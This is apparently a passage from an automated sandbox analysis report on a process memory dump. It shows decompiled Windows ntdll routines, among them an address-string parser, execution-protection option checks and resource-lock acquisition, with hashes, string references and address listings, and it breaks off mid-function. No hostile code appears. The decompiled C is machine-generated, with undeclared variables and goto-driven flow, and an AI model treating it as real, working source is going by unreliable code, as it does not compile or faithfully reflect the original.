                                    0x02303f7e
                                    0x02303f86
                                    0x022e7f39
                                    0x022e7f47
                                    0x022e7f47
                                    0x022e7f37
                                    0x022e7f37
                                    0x00000000

                                    APIs
                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02303F12
                                    Strings
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02303F75
                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02303F4A
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02303EC4
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0230E345
                                    • Execute=1, xrefs: 02303F5E
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0230E2FB
                                    • ExecuteOptions, xrefs: 02303F04
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: BaseDataModuleQuery
                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 3901378454-484625025
                                    • Opcode ID: 0d2278e653f0d46dcbd8c3f1088fbd76332d7ae7c3d365b963209d85f1a9d57b
                                    • Instruction ID: 8dd49c32037cb557b89846fde0e24a570e9becfd5412f5c3dee36b01a9a98fd5
                                    • Opcode Fuzzy Hash: 0d2278e653f0d46dcbd8c3f1088fbd76332d7ae7c3d365b963209d85f1a9d57b
                                    • Instruction Fuzzy Hash: 4C41E972A9030CBAEF219AD4DCD5FDAB3BDAF14704F4005A9E506A6084EB70EA459F71
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022F0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E022F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E022C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E022BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E022F0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E022F0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E022F06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E022F06BA(_t135, _t178) == 0 || E022F0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E022F0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E022F0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E022F06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E022F06BA(_t124, _t142) == 0 || E022F0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                    0x022f0b21
                                    0x022f0b24
                                    0x022f0b27
                                    0x022f0b2a
                                    0x022f0b2d
                                    0x022f0b30
                                    0x022f0b33
                                    0x022f0b36
                                    0x022f0b39
                                    0x022f0b3e
                                    0x022f0c65
                                    0x022f0c68
                                    0x022f0c6a
                                    0x022f0c6f
                                    0x0231eb42
                                    0x00000000
                                    0x00000000
                                    0x0231eb48
                                    0x0231eb48
                                    0x022f0c75
                                    0x022f0c7a
                                    0x0231eb54
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0231eb5a
                                    0x022f0c80
                                    0x022f0c84
                                    0x0231eb98
                                    0x00000000
                                    0x00000000
                                    0x0231eba6
                                    0x022f0cb8
                                    0x022f0cba
                                    0x022f0cd3
                                    0x022f0cda
                                    0x022f0ce4
                                    0x022f0ce9
                                    0x00000000
                                    0x022f0cec
                                    0x022f0c8c
                                    0x0231eb63
                                    0x00000000
                                    0x00000000
                                    0x0231eb70
                                    0x0231eb75
                                    0x0231eb7d
                                    0x00000000
                                    0x00000000
                                    0x0231eb8c
                                    0x00000000
                                    0x0231eb8c
                                    0x022f0c96
                                    0x00000000
                                    0x00000000
                                    0x022f0ca2
                                    0x022f0cac
                                    0x022f0cb4
                                    0x00000000
                                    0x00000000
                                    0x022f0b44
                                    0x022f0b47
                                    0x022f0b49
                                    0x00000000
                                    0x00000000
                                    0x022f0b4f
                                    0x022f0b50
                                    0x00000000
                                    0x00000000
                                    0x022f0b56
                                    0x022f0b62
                                    0x022f0b7c
                                    0x022f0bac
                                    0x022f0a0f
                                    0x0231eaaa
                                    0x00000000
                                    0x0231eac4
                                    0x0231eac4
                                    0x022f0bd0
                                    0x022f0bd0
                                    0x022f0bd4
                                    0x022f0bd9
                                    0x00000000
                                    0x00000000
                                    0x022f0bdb
                                    0x022f0be0
                                    0x0231eb0e
                                    0x022f0a1a
                                    0x00000000
                                    0x022f0a1a
                                    0x0231eb1a
                                    0x0231eb1f
                                    0x0231eb27
                                    0x00000000
                                    0x00000000
                                    0x0231eb36
                                    0x00000000
                                    0x0231eb36
                                    0x022f0bea
                                    0x00000000
                                    0x00000000
                                    0x022f0bf6
                                    0x022f0c00
                                    0x022f0c03
                                    0x022f0c0b
                                    0x00000000
                                    0x022f0c0b
                                    0x0231eaaa
                                    0x00000000
                                    0x022f0a15
                                    0x022f0bb6
                                    0x00000000
                                    0x022f0bc6
                                    0x022f0bc6
                                    0x022f0bcb
                                    0x022f0c15
                                    0x00000000
                                    0x00000000
                                    0x022f0c1d
                                    0x022f0c20
                                    0x022f0c21
                                    0x022f0c24
                                    0x022f0c24
                                    0x022f0c26
                                    0x00000000
                                    0x022f0c26
                                    0x022f0bcd
                                    0x00000000
                                    0x022f0bcd
                                    0x022f0b89
                                    0x022f0b89
                                    0x022f0b90
                                    0x00000000
                                    0x00000000
                                    0x022f0b96
                                    0x00000000
                                    0x022f0b96
                                    0x022f0a04
                                    0x022f0a04
                                    0x022f0b9a
                                    0x022f0b9a
                                    0x022f0b9b
                                    0x022f0b9f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x022f0ba5
                                    0x022f0ac7
                                    0x022f0aca
                                    0x0231eacf
                                    0x00000000
                                    0x0231eade
                                    0x0231eade
                                    0x0231eae3
                                    0x00000000
                                    0x00000000
                                    0x0231eaf3
                                    0x0231eaf6
                                    0x0231eaf7
                                    0x0231eafe
                                    0x0231eb01
                                    0x00000000
                                    0x0231eb01
                                    0x0231eacf
                                    0x022f0ad0
                                    0x022f0ad4
                                    0x00000000
                                    0x00000000
                                    0x022f0ada
                                    0x022f0ae6
                                    0x022f0c34
                                    0x00000000
                                    0x022f0c47
                                    0x022f0c49
                                    0x022f0c4a
                                    0x022f0c4e
                                    0x022f0c51
                                    0x022f0c54
                                    0x022f0c57
                                    0x022f0c5a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x022f0c60
                                    0x022f0afb
                                    0x022f0afe
                                    0x022f0b02
                                    0x022f0b05
                                    0x022f0b08
                                    0x00000000
                                    0x022f0b08
                                    0x022f0ae6
                                    0x022f0b44
                                    0x022f09f8
                                    0x022f09f8
                                    0x022f09f9
                                    0x00000000
                                    0x00000000
                                    0x0231eaa0
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __fassign
                                    • String ID: .$:$:
                                    • API String ID: 3965848254-2308638275
                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction ID: 20d9d27ebc41b10fa5badad31fea08d39259fbf59e69a011a36e67e2d4a1613a
                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction Fuzzy Hash: 79A19C71D2030ADADFA4CFE4C8446AEF7B5AF04308F24847ADA06A728ED7749B45CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022F0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 49%
                                    			E022F0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023901c0;
									_push(_t144);
									_push(0);
									_t51 = E022AF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E022F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02303F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02303F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0233217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02303F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E022F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023901c0;
												_push(_t138);
												_push(0);
												_t58 = E022AF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E022F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02303F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02303F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0233217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02303F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E022F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E022D5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E022AF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E022F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E022AF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E022F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E022AF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E022F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E022D5329(_t110, _t138);
																return E022D53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                    0x022f055a
                                    0x022f055d
                                    0x022f0563
                                    0x022f0566
                                    0x022f05d8
                                    0x022f05e2
                                    0x022f05e5
                                    0x00000000
                                    0x022f05e7
                                    0x022f05e7
                                    0x022f05ea
                                    0x022f05f3
                                    0x022f05f3
                                    0x022f0568
                                    0x022f0568
                                    0x022f0568
                                    0x022f0569
                                    0x022f0569
                                    0x022f0569
                                    0x022f056b
                                    0x00000000
                                    0x00000000
                                    0x0231217f
                                    0x02312183
                                    0x0231225b
                                    0x0231225f
                                    0x02312189
                                    0x0231218c
                                    0x0231218f
                                    0x02312194
                                    0x02312199
                                    0x0231219d
                                    0x023121a0
                                    0x023121a2
                                    0x023121ce
                                    0x023121ce
                                    0x023121ce
                                    0x023121d0
                                    0x023121d6
                                    0x023121de
                                    0x023121e2
                                    0x023121e8
                                    0x023121e9
                                    0x023121ec
                                    0x023121f1
                                    0x023121f6
                                    0x00000000
                                    0x00000000
                                    0x023121f8
                                    0x023121fb
                                    0x02312206
                                    0x0231220b
                                    0x0231220c
                                    0x02312217
                                    0x02312226
                                    0x0231222b
                                    0x0231222c
                                    0x0231222f
                                    0x02312232
                                    0x02312235
                                    0x02312235
                                    0x0231223a
                                    0x0231223f
                                    0x02312241
                                    0x02312243
                                    0x02312248
                                    0x02312248
                                    0x0231224d
                                    0x0231224f
                                    0x02312262
                                    0x02312263
                                    0x02312268
                                    0x02312269
                                    0x02312269
                                    0x02312269
                                    0x0231226d
                                    0x00000000
                                    0x00000000
                                    0x02312276
                                    0x02312279
                                    0x0231227e
                                    0x02312283
                                    0x02312287
                                    0x0231228a
                                    0x0231228d
                                    0x0231228f
                                    0x023122bc
                                    0x023122bc
                                    0x023122bc
                                    0x023122be
                                    0x023122c4
                                    0x023122cc
                                    0x023122d0
                                    0x023122d6
                                    0x023122d7
                                    0x023122da
                                    0x023122df
                                    0x023122e4
                                    0x00000000
                                    0x00000000
                                    0x023122e6
                                    0x023122e9
                                    0x023122f4
                                    0x023122f9
                                    0x023122fa
                                    0x02312305
                                    0x02312314
                                    0x02312319
                                    0x0231231a
                                    0x0231231d
                                    0x02312320
                                    0x02312323
                                    0x02312323
                                    0x02312328
                                    0x0231232d
                                    0x0231232f
                                    0x02312331
                                    0x02312336
                                    0x02312336
                                    0x0231233b
                                    0x0231233d
                                    0x02312350
                                    0x02312351
                                    0x02312356
                                    0x02312359
                                    0x02312359
                                    0x0231235b
                                    0x0231235d
                                    0x022d5367
                                    0x022d536b
                                    0x022d5372
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x02312363
                                    0x02312363
                                    0x02312369
                                    0x0231236a
                                    0x0231236c
                                    0x02312371
                                    0x02312373
                                    0x00000000
                                    0x02312379
                                    0x02312379
                                    0x0231237a
                                    0x0231237f
                                    0x0231237f
                                    0x02312385
                                    0x02312386
                                    0x02312389
                                    0x0231238e
                                    0x02312390
                                    0x022d5378
                                    0x022d537c
                                    0x02312396
                                    0x02312396
                                    0x02312397
                                    0x0231239c
                                    0x023123a2
                                    0x023123a3
                                    0x023123a6
                                    0x023123ab
                                    0x023123ad
                                    0x00000000
                                    0x023123b3
                                    0x023123b3
                                    0x023123b4
                                    0x023123b9
                                    0x023123ba
                                    0x023123ba
                                    0x023123bc
                                    0x023123bf
                                    0x00000000
                                    0x00000000
                                    0x02309153
                                    0x02309158
                                    0x0230915a
                                    0x0230915e
                                    0x02309160
                                    0x00000000
                                    0x02309166
                                    0x02309166
                                    0x02309171
                                    0x02309176
                                    0x02309176
                                    0x00000000
                                    0x02309160
                                    0x023123c6
                                    0x023123d7
                                    0x023123d7
                                    0x023123ad
                                    0x02312390
                                    0x02312373
                                    0x0231233f
                                    0x0231233f
                                    0x00000000
                                    0x0231233f
                                    0x02312291
                                    0x02312291
                                    0x02312293
                                    0x02312295
                                    0x0231229a
                                    0x023122a1
                                    0x023122a3
                                    0x023122a7
                                    0x023122a9
                                    0x00000000
                                    0x00000000
                                    0x023122ab
                                    0x023122ad
                                    0x023122af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x023122af
                                    0x023122b1
                                    0x023122b4
                                    0x023122b4
                                    0x023122b6
                                    0x022d53be
                                    0x022d53be
                                    0x022d53be
                                    0x022d53c0
                                    0x00000000
                                    0x00000000
                                    0x022d53cb
                                    0x022d53ce
                                    0x022d53d0
                                    0x022d53d4
                                    0x022d53d6
                                    0x00000000
                                    0x022d53d8
                                    0x022d53e3
                                    0x022d53ea
                                    0x022d53ea
                                    0x00000000
                                    0x022d53d6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x023122b6
                                    0x00000000
                                    0x0231228f
                                    0x02312349
                                    0x0231234d
                                    0x02312251
                                    0x02312251
                                    0x00000000
                                    0x02312251
                                    0x023121a4
                                    0x023121a4
                                    0x023121a6
                                    0x023121a8
                                    0x023121ac
                                    0x023121b6
                                    0x023121b8
                                    0x023121bc
                                    0x023121be
                                    0x00000000
                                    0x00000000
                                    0x023121c0
                                    0x023121c2
                                    0x023121c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x023121c4
                                    0x023121c6
                                    0x023121c6
                                    0x023121c8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x023121c8
                                    0x023121a2
                                    0x00000000
                                    0x02312183
                                    0x022f057b
                                    0x022f057d
                                    0x022f0581
                                    0x022f0583
                                    0x02312178
                                    0x00000000
                                    0x022f0589
                                    0x022f058f
                                    0x022f058f
                                    0x022f0583
                                    0x00000000

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02312206
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-4236105082
                                    • Opcode ID: 85d1611344de3a55a6354f9a3968a050f4a0527848160f77f5b5ba1926949159
                                    • Instruction ID: 2b6723b776fdca9047302124834a4019cf36e4da18d1348ee5d0998a53c304a1
                                    • Opcode Fuzzy Hash: 85d1611344de3a55a6354f9a3968a050f4a0527848160f77f5b5ba1926949159
                                    • Instruction Fuzzy Hash: 56514C317103116FEB69DA58CCC1FA773AAAF88710F214269FD45DB289DA71EC42CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022F14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E022F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2392088; // 0x777da72f
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
